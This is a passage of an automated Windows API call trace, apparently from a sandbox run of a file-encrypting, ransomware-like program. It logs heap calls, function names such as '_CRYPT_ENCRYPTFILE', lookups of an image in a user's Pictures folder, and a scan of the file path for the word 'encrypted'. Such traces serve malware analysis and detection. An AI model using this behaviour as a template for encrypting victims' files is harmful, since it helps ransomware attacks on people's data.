RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.541] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.541] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.541] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.541] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.541] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0039.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.542] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec96c9a0, ftCreationTime.dwHighDateTime=0x1d5c32c, ftLastAccessTime.dwLowDateTime=0x82d46af0, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0x82d46af0, ftLastWriteTime.dwHighDateTime=0x1d5b647, nFileSizeHigh=0x0, nFileSizeLow=0x15c26, dwReserved0=0x0, dwReserved1=0x777648, cFileName="KmZe-_JDZKS16W.png", cAlternateFileName="KMZE-_~1.PNG")) returned 0x7c20c0 [0039.542] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.543] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.544] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec96c9a0, ftCreationTime.dwHighDateTime=0x1d5c32c, ftLastAccessTime.dwLowDateTime=0x82d46af0, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0x82d46af0, ftLastWriteTime.dwHighDateTime=0x1d5b647, nFileSizeHigh=0x0, nFileSizeLow=0x15c26, dwReserved0=0x0, dwReserved1=0x777648, cFileName="KmZe-_JDZKS16W.png", cAlternateFileName="KMZE-_~1.PNG")) returned 0x7c20c0 [0039.544] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.544] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KmZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZe-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ze-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JDZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZKS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S16W.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0039.547] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0039.547] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0039.547] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 